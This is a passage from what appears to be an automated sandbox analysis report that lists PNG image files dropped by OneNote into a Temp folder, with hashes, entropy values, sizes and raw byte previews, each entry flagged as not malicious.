                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{BC41D88C-0536-495E-9755-09D1E6515E5D}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{BDCD56AC-1EE0-4E9C-80E6-4EE19F2F41E0}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{BFAF42AD-171E-4164-8EE2-B6FCA6988755}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{BFE1DF0A-EE34-47FE-8584-679F03DF07D8}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{C1A49B51-8083-4F98-B683-C38F3B2D62E8}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{C4326A53-BF36-4883-9575-2958B5AB1422}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{C4E4C192-C54B-447E-B602-4B232F4E8A35}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{C735E5C7-5840-4407-A265-65368FB04271}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{C91BD2AD-5945-4CA3-851B-3CBE5A6EE7B0}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{CB3A16EA-EE53-4AD7-8A70-02070E45C79D}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{CCCBBEBD-E693-481E-86F8-2668FDE4F7BC}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{CDD71B4A-C24B-48C7-8799-EA4F6099A0C9}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
